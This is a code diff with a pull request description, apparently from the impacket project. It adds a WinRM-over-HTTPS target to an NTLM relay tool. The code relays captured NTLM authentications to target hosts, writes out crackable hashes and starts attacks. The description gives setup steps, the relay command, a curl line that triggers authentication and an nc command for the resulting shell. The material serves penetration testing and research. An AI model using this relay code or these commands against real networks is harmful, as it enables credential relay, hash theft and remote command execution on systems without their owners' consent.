+        def do_ntlm_auth(self,token,authenticateMessage):
+            if authenticateMessage['user_name'] != '' or self.target.hostname == '127.0.0.1':
+                clientResponse, errorCode = self.client.sendAuth(token)
+            else:
+                errorCode = STATUS_ACCESS_DENIED
+
+            if errorCode == STATUS_SUCCESS:
+                return True
+
+            return False
+
+        def do_local_auth(self, messageType, token, proxy):
+            if messageType == 1:
+                negotiateMessage = ntlm.NTLMAuthNegotiate()
+                negotiateMessage.fromString(token)
+                ansFlags = 0
+
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_56:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_56
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_128:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_128
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_UNICODE
+                if negotiateMessage['flags'] & ntlm.NTLM_NEGOTIATE_OEM:
+                    ansFlags |= ntlm.NTLM_NEGOTIATE_OEM
+
+                ansFlags |= ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_TARGET_INFO | \
+                            ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_NTLM
+
+                challengeMessage = ntlm.NTLMAuthChallenge()
+                challengeMessage['flags'] = ansFlags
+                challengeMessage['domain_name'] = ""
+                challengeMessage['challenge'] = ''.join(random.choice(string.printable) for _ in range(64))
+                challengeMessage['TargetInfoFields'] = ntlm.AV_PAIRS()
+                challengeMessage['TargetInfoFields_len'] = 0
+                challengeMessage['TargetInfoFields_max_len'] = 0
+                challengeMessage['TargetInfoFields_offset'] = 40 + 16
+                challengeMessage['Version'] = b'\xff' * 8
+                challengeMessage['VersionLen'] = 8
+
+                self.do_AUTHHEAD(message=b'Negotiate ' + base64.b64encode(challengeMessage.getData()),proxy=proxy)
+                return
+
+            elif messageType == 3:
+                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
+                authenticateMessage.fromString(token)
+
+                if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
+                                                authenticateMessage['user_name'].decode('utf-16le'))).upper()
+                else:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
+                                                authenticateMessage['user_name'].decode('ascii'))).upper()
+
+                self.target = self.server.config.target.getTarget(identity = self.authUser)
+                if self.target is None:
+                    LOG.info("WinRMS(%s): Connection from %s@%s controlled, but there are no more targets left!" %
+                        (self.server.server_address[1], self.authUser, self.client_address[0]))
+                    self.send_not_found()
+                    return
+
+                LOG.info("WinRMS(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                    self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+
+                self.relayToHost = True
+                self.do_REDIRECT()
+
+        def do_relay(self, messageType, token, proxy, content = None):
+            if messageType == 1:
+                if self.server.config.disableMulti:
+                    self.target = self.server.config.target.getTarget(multiRelay=False)
+                    if self.target is None:
+                        LOG.info("WinRMS(%s): Connection from %s controlled, but there are no more targets left!" % (
+                            self.server.server_address[1], self.client_address[0]))
+                        self.send_not_found()
+                        return
+
+                    LOG.info("WinRMS(%s): Connection from %s controlled, attacking target %s://%s" % (
+                        self.server.server_address[1], self.client_address[0], self.target.scheme, self.target.netloc))
+
+                if not self.do_ntlm_negotiate(token, proxy=proxy):
+                    # Connection failed
+                    if self.server.config.disableMulti:
+                        LOG.error('WinRMS(%s): Negotiating NTLM with %s://%s failed' % (self.server.server_address[1],
+                                  self.target.scheme, self.target.netloc))
+                        self.send_not_found()
+                        return
+                    else:
+                        LOG.error('WinRMS(%s): Negotiating NTLM with %s://%s failed. Skipping to next target' % (
+                            self.server.server_address[1], self.target.scheme, self.target.netloc))
+
+                        self.target = self.server.config.target.getTarget(identity=self.authUser)
+
+                        if self.target is None:
+                            LOG.info( "WinRMS(%s): Connection from %s@%s controlled, but there are no more targets left!" %
+                                (self.server.server_address[1], self.authUser, self.client_address[0]))
+                            self.send_not_found()
+                            return
+
+                        LOG.info("WinRMS(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                            self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+
+                        self.do_REDIRECT()
+
+            elif messageType == 3:
+                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
+                authenticateMessage.fromString(token)
+
+                if self.server.config.disableMulti:
+                    if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
+                                                    authenticateMessage['user_name'].decode('utf-16le'))).upper()
+                    else:
+                        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
+                                                    authenticateMessage['user_name'].decode('ascii'))).upper()
+                    target = '%s://%s@%s' % (self.target.scheme, self.authUser.replace("/", '\\'), self.target.netloc)
+
+                if not self.do_ntlm_auth(token, authenticateMessage):
+                    LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc,
+                                                                               self.authUser))
+                    if self.server.config.disableMulti:
+                        self.send_not_found()
+                        return
+
+                    # Only skip to next if the login actually failed, not if it was just anonymous login or a system account
+                    # which we don't want
+                    if authenticateMessage['user_name'] != '':  # and authenticateMessage['user_name'][-1] != '$':
+                        # No anonymous login, go to next host and avoid triggering a popup
+                        self.target = self.server.config.target.getTarget(identity=self.authUser)
+                        if self.target is None:
+                            LOG.info("WinRMS(%s): Connection from %s@%s controlled, but there are no more targets left!" %
+                                (self.server.server_address[1], self.authUser, self.client_address[0]))
+                            self.send_not_found()
+                            return
+
+                        LOG.info("WinRMS(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                            self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+
+                        self.do_REDIRECT()
+                    else:
+                        # If it was an anonymous login, send 401
+                        self.do_AUTHHEAD(b'Negotiate', proxy=proxy)
+                else:
+                    # Relay worked, do whatever we want here...
+                    LOG.info("WinRMS(%s): Authenticating against %s://%s as %s SUCCEED" % (self.server.server_address[1],
+                        self.target.scheme, self.target.netloc, self.authUser))
+
+                    ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
+                                                        authenticateMessage['user_name'],
+                                                        authenticateMessage['domain_name'],
+                                                        authenticateMessage['lanman'], authenticateMessage['ntlm'])
+                    self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
+
+                    if self.server.config.outputFile is not None:
+                        writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
+                                              self.server.config.outputFile)
+
+                    if self.server.config.dumpHashes is True:
+                        LOG.info(ntlm_hash_data['hash_string'])
+
+                    self.do_attack()
+
+                    if self.server.config.disableMulti:
+                        # We won't use the redirect trick, closing connection...
+                        if self.command == "PROPFIND":
+                            self.send_multi_status(content)
+                        else:
+                            self.send_not_found()
+                        return
+                    else:
+                        # Let's grab our next target
+                        self.target = self.server.config.target.getTarget(identity=self.authUser)
+
+                        if self.target is None:
+                            LOG.info("WinRMS(%s): Connection from %s@%s controlled, but there are no more targets left!" % (
+                                self.server.server_address[1], self.authUser, self.client_address[0]))
+
+                            # Return Multi-Status status code to WebDAV servers
+                            if self.command == "PROPFIND":
+                                self.send_multi_status(content)
+                                return
+
+                            # Serve image and return 200 if --serve-image option has been set by user
+                            if (self.server.config.serve_image):
+                                self.serve_image()
+                                return
+
+                            # And answer 404 not found
+                            self.send_not_found()
+                            return
+
+                        # We have the next target, let's keep relaying...
+                        LOG.info("WinRMS(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                            self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+                        self.do_REDIRECT()
+
+        def do_attack(self):
+            # Check if SOCKS is enabled and if we support the target scheme
+            if self.server.config.runSocks and self.target.scheme.upper() in self.server.config.socksServer.supportedSchemes:
+                # Pass all the data to the socksplugins proxy
+                activeConnections.put((self.target.hostname, self.client.targetPort, self.target.scheme.upper(),
+                                       self.authUser, self.client, self.client.sessionData))
+                return
+
+            # If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks
+            if self.target.scheme.upper()  in self.server.config.attacks:
+                # We have an attack.. go for it
+                clientThread = self.server.config.attacks[self.target.scheme.upper()](self.server.config, self.client.session,
+                                                                               self.authUser)
+                clientThread.start()
+            else:
+                LOG.error('WinRMS(%s): No attack configured for %s' % (self.server.server_address[1], self.target.scheme.upper()))
+
+    def __init__(self, config):
+        Thread.__init__(self)
+        self.daemon = True
+        self.config = config
+        self.server = None
+        self.httpport = None
+
+    def run(self):
+        if not self.config.listeningPort:
+            self.config.listeningPort = 5986
+
+        LOG.info("Setting up WinRMS (HTTPS) Server on port %s" % self.config.listeningPort)
+        self.server = self.HTTPServer((self.config.interfaceIp, self.config.listeningPort), self.HTTPHandler, self.config)
+
+        try:
+             self.server.serve_forever()
+        except KeyboardInterrupt:
+             pass
+
+        LOG.info('Shutting down WinRMS (HTTPS) Server')
+        self.server.server_close()


### PR DESCRIPTION
Hello,

First of all sorry, I kinda screwed with my branches and purged the previous PR. Here is the PR again which adds a new relay capability allowing us to relay SMB/LDAP/HTTP NTLM (v1 or unsecured ones) authentications to the WinRM HTTPS endpoint. This will especially be useful if:

* NTLMv1 is activated (natively or via downgrade attacks) ;
* MITM allows redirecting legitimate WinRM connections to our listener ;
* WinRM listener is configured to not support CBT (CBT=None).

This endpoint is not configured on a default server installation but it is not protected by Channel Binding once configured by a sysadmin which makes it a possible great relay alternative for remote code executino.

Default action creates an interactive TCP shell that can be used via NC (socks is also implemented):

![image](https://github.com/user-attachments/assets/f2a74db7-d3e5-40d0-8053-a30ec2838e5f)

I'm adding @dadevel's comment as well, for anybody wanting to play with this PR, you can setup the WinRMS endpoint that way:

```PowerShell
New-SelfSignedCertificate -Subject 'CN=dc01.corp.local' -TextExtension '2.5.29.37={text}1.3.6.1.5.5.7.3.1'c
winrm create 'winrm/config/Listener?Address=*+Transport=HTTPS' '@{Hostname="dc01.corp.local"; CertificateThumbprint="9592A6D026E71AFFA17049D16D74AA7C47A89788"}'
New-NetFirewallRule -DisplayName 'WinRM HTTPS' -Direction 'Inbound' -LocalPort 5986 -Protocol 'TCP' -Action 'Allow' -Program 'System'
```

> Don't forget to change the computer name and the certificate thumbprint 

Start relay server.

```bash
ntlmrelayx.py -debug --no-smb-server --no-wcf-server --no-raw-server -t winrms://dc01.corp.local
```

Trigger authentication.

```bash
curl http://localhost -u 'corp\administrator:passw0rd' --ntlm
``` 

And get a shell:


```bash
nc -v 127.0.0.1 11000
```